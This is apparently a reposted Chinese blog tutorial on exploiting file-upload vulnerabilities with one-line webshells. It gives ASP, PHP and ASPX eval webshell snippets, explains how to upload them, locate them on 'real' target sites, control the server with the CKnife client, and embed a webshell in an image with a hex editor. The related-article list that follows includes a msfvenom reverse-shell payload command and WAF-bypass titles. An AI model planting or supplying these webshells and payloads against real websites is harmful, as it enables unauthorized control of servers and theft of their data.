上传漏洞-一句话木马

article/2025/10/1 0:08:16

声明:为什么又写一篇关于一句话木马,对,我第一次没写明白,直写了一句话木马的简单制作,但是还是有很多同学真的看不懂,所以我今天改一下,这次精写!

上传漏洞-一句话木马

讲述内容:

  • 一句话木马 木马使用技巧
  • (中国菜刀、C32、CKnife)

简介:

  • 一句话木马

一句话木马短小精悍,而且功能强大,隐蔽性非常好,在入侵中始终扮演着强大的作用
往目标网站中加入一句话木马,然后你就可以在本地通过中国菜刀chopper.exe即可获取和控制整个网站目录并可执行一些web账号所有权限的系统命令,进入后渗透阶段。但是发现百度上找到的菜刀都有后门,而且找了很久都没有找到可以用的菜刀,所以推荐两款更好的kali下的工具:webacoo、Weevely 和windows下的工具:CKnife java版本的中国菜刀。


接下来我将演示CKnife java版本的中国菜刀的使用方法,并进行讲解

本程序需要设置 JAVA运行环境

jdk32位 下载 http://www.uzzf.com/soft/395.html

jdk64位 下载 http://www.uzzf.com/soft/77216.html

CKnife java版本菜刀 下载 http://pan.baidu.com/s/1boyQTXH


使用

1.下载菜刀,打开Cknife.jar软件,选择用java打开
在这里插入图片描述
2.在上传一句话漏洞时,我们有两个方法

<1.已经有了网站后台的登录密码以及账号,登录网站后台后上传一句话木马文件>

<2.在一些网站如论坛等等用户可以上传附件>//这种方法成功率不高,很多网站对附件有限制

在这里我用虚拟机搭一个靶机,模拟网站服务器.

靶机IP地址为:192.168.138.131
在这里插入图片描述
3.模拟上传木马文件步骤到服务器

写法——

Asp一句话:<%eval request(“xxx”)%>

Php 一句话:<%php @eval($_POST[xxx]);?>

Aspx一句话:<%@ Page Languag=”xxx”%><%eval(Request.Item[“xxx”])%>

(然后保存为相应的文件格式并上传)//xxx是连接的密码,必须记住,重命名时不能有中文

在这里插入图片描述

4.找到我们上传木马的地址

在这里插入图片描述
如果是在真正的实战中我们怎么得到木马的地址呢??

我们可以在前端找到我们上传的附件,然后右击审查属性,就可以看到附件的地址。也可以在网站后台找到附件存储的位置

在这里插入图片描述
5.打开Cknife.jar软件

右键点击添加,输入上传的php文件地址,php文件密码,脚本类型选择PHP,字符编码GB2312,点击添加

在这里插入图片描述

6.右键文件管理就可以了

在这里插入图片描述

除了文件上传还有图片上传,把一句话漏洞加载到图片里面,通过文件上传的方式上传一句话木马//图片连接性不高,需要iis的解析漏洞,这个漏洞是很久以前的了,所以连接性不高

工具:C32反翻译软件

步骤:打开C32反翻译软件→将图片拖入软件里面(16进制模式)→在右面代码最下端写入一句话代码→另存为(后缀改为图片原本的后缀)

在这里插入图片描述

写代码是热爱,写到世界充满爱!


http://chatgpt.dhexx.cn/article/ru6qf5xB.shtml

相关文章

[对抗训练]“中国菜刀”安装,20180222

[对抗训练]“中国菜刀”安装与使用 一、下载开源代码 从GitHub上下载开源的“中国菜刀”Java项目代码 地址&#xff1a;https://github.com/Chora10/Cknife压缩文件见附件1。 二、将项目存为可执行jar 打开eclipse&#xff08;或其他java编辑器&#xff09; 添加解压后的“中国…

我的java16和java8冲突解决办法(java版本冲突解决方法)

我的java16和java8冲突解决办 我的问题 vscode 支持java11以上burpsuite 支持java11以上cknife 只能java8JEB 只能java8全局变量设置java16的路径 对于java8 直接把只支持java8的文件目录放到java8中 在这里中用的是java8,这个目录有java文件 这个脚本可以自动隐藏窗口打开一…

msf上传文件到服务器,利用MSF技巧进入服务器

原标题&#xff1a;利用MSF技巧进入服务器 首先需要一台公网的机器,这是留着方便以后转发或者反弹用的. 1.生成payload的方式 msfvenom -p windows/meterpreter/reverse_tcp LHOST1.2.3.4 LPORT2333 -f exe -o 1234.exe 之后把后门复制出来上传到webshell 推荐不使用exe后缀 因…

mbp 封神台靶场 六(笔记)

打开链接&#xff0c;根据题目提示&#xff0c;flag在c盘根目录下&#xff0c;接上一关的网页后台&#xff0c;打开c盘,发现确实存在flag.txt&#xff0c;但是提示没有权限。 于是知道本关需要我们去进行提权操作&#xff0c;打开D盘&#xff0c;发现cmd.exe和iis6.exe&#xf…

张小白的渗透之路(五)——上传漏洞及解析漏洞详解

前言 web应用程序通常会有文件上传的功能&#xff0c;例如在BBS发布图片、在个人网站发布压缩包&#xff0c;只要web应用程序允许上传文件&#xff0c;就有可能存在文件上传漏洞。 上传漏洞与sql注射相比&#xff0c;风险更大&#xff0c;如果web应用程序存在上传漏洞&#xf…

Kali下常见webshell管理工具汇总

转 自 https://www.ohlinge.cn/kali/kali_webshell.html 0x01 前言 Kali Linux作为一款专为渗透测试而生的Linux操作系统&#xff0c;在安全界的影响广泛。一般的webshell在Windows下面经常使用Chopper(中国菜刀)来管理&#xff0c;那么在Linux下面&#xff0c;有没有类似的工…

菜刀渗透

快速搭建discuz论坛 使用kali下BurpSuite对discuz后台注入php木马 使用Cknife“菜刀”.上传webshell木马到网站 使用Webshell查看mysql数据库密码并盗取数据库 快速搭建discuz论坛 攻击思路 想要拿下一台主机A的权限&#xff1a; 1、了解一下这个服务器:端口,服务器版本…

无法直接打开jar文件,提示“你要以何种方式打开.jar文件”(已解决)

问题引入&#xff1a; 网络安全&CTF竞赛中有很多封装好的工具类似Cknife/CTFcrackTools.jar/Stegsolve.jar需要java环境打开 问题描述&#xff1a; .jar文件只能通过dos命令打开&#xff0c;点击jar文件提示你要以何种方式打开.jar文件&#xff0c;并且选中jdk/bin/java…

开源渗透测试工具合集

子域名枚举工具 子域枚举和信息收集工具 Anubis 项目地址&#xff1a;https://github.com/jonluca/Anubis使用名为 Hacking with search engine 的技术列出有关主域的子域 N4xD0rk 项目地址&#xff1a;https://github.com/n4xh4ck5/N4xD0rk子域名爆破枚举工具 subDomainsBrut…

DVWA的upload文件上传漏洞(全难度)(小白向)

提示&#xff1a;只是为了方便理解&#xff0c;但不一定符合您的要求 文章目录 一、等级&#xff1a;low 二、等级&#xff1a;medium 三、等级&#xff1a;high 四&#xff1a;等级&#xff1a;impossible 前言 靶机ip&#xff1a;192.168.229.145 DVWA版本&#xff1a;v1.…

c php乱码,Cknife的PHP功能部分修正,解决SHELL无法回显以及中文乱码

在现在满大街菜刀都存在后门问题的时候,Cknife横空出世了。因为开源&#xff0c;所以安全。因为可操作的空间挺大的&#xff0c;也十分适合过各种WAF。下面就是解决两个常见问题的过程。希望可以帮到各位白帽子。 但是使用过程中也遇到了一些小问题&#xff0c;被吐槽最多的就是…

致远OA_0day批量植Cknife马一步到位

最近各位师傅都在刷这个嘛&#xff0c;原本的exp是上传一个test123456.jsp的命令执行的马子&#xff0c;不过我在试的时候发现替换成C刀一句话出错,原因未知&#xff0c;并且test123456.jsp如果存在的话用原来exp是无法覆盖的。参考改进了t00ls师傅的代码(https://www.t00ls.ne…

linux 安全狗 乱码,打狗棒法之:Cknife(C刀)自定义模式秒过安全狗

免责声明&#xff1a;本站提供安全工具、程序(方法)可能带有攻击性&#xff0c;仅供安全研究与教学之用&#xff0c;风险自负! 相关阅读&#xff1a; 0x00 前言 很多朋友在使用Cknife时都误以为她只是菜刀的跨平台升级版&#xff0c;仅仅多了跨平台的功能&#xff0c;其实小伙伴…

Cknife流量分析

本文首发&#xff1a;https://<img src1 οnerrοr\u006coc\u0061tionj\x61v\x61script:\x61lert\x281\x29>testdemo 0x01 环境 <?php eval($_REQUEST[shell] ?> 0x02 命令执行 执行命令结果如下图所示 POST的数据如下图所示 对POST的数据解码 #shell eval(base6…

渗透工具环境篇——Cknife中国菜刀的使用

提要 在学习上传漏洞的时候研究到了Cknife这个软件。下面来介绍一下菜刀的使用方法。 使用 1.下载菜刀&#xff0c;打开Cknife.jar软件 2.右键点击添加 3.输入上传的php文件&#xff0c;php文件密码&#xff0c;脚本类型选择PHP&#xff0c;字符编码GB2312&#xff0c;点…

关于cknife与burpsuite对java的版本需求的冲突机器解决办法

之前安装burpsuite时候使用的是jdk11,一直使用的没有问题&#xff0c;后来接触到了cknife,但在使用时却发现cknife需要jre1.7以上版本&#xff0c;但这有是burpsuit无法兼容的&#xff0c;翻来覆去整了半天&#xff0c;终于搞定了。。 1.先删除jdk-11 2.下载jdk-7u80,这里面是…

打狗棒法之:Cknife(C刀)自定义模式秒过安全狗(二)

免责声明&#xff1a;本站提供安全工具、程序(方法)可能带有攻击性&#xff0c;仅供安全研究与教学之用&#xff0c;风险自负! 000 前言 亲爱的Chora小伙伴在上文说过&#xff0c;他是一个有责任心的基佬&#xff0c;要手把手为大家&#xff08;不&#xff09;负责任的讲解如何…

图像位运算、掩模

图像位运算、掩模 原图 添加的RGB图像 1. 选取原图中的感兴趣的区域&#xff0c;即ROI&#xff08;region of interest&#xff09; 2. 将要添加的RGB图像转换成灰度图像 img2gray cv2.cvtColor(img2, cv2.COLOR_BGR2GRAY)3. 将灰度图像进一步转成二值图像&#xff0c;即…

【图像锐化】非锐化掩模 USM(Unsharpen Mask)与锐化掩模 SM(Sharpen Mask)

非锐化掩模USM&#xff08;Unsharpen Mask&#xff09;与锐化掩模 SM&#xff08;Sharpen Mask&#xff09; 掩膜操作可以提高图像对比度&#xff0c;对比度提高可以增加图像感官度、锐化&#xff0c;让看起来有点模糊的图像更清晰。 原理&#xff1a;提取图像的高频分量&#…

2021年中国光掩模玻璃基板行业市场需求量分析:IC、FPD领域快速发展带动光掩模玻璃基板需求量不断增长[图]

一、概述 光刻掩膜版,简称掩膜版,是微纳加工技术常用的光刻工艺所使用的图形母版。由不透明的遮光薄膜在透明基板上形成掩膜图形结构,再通过曝光过程将图形信息转移到产品基片上。 光学掩模板是在薄膜、塑料或玻璃基体材料上制作各种功能图形并精确定位,以便用于光致抗蚀…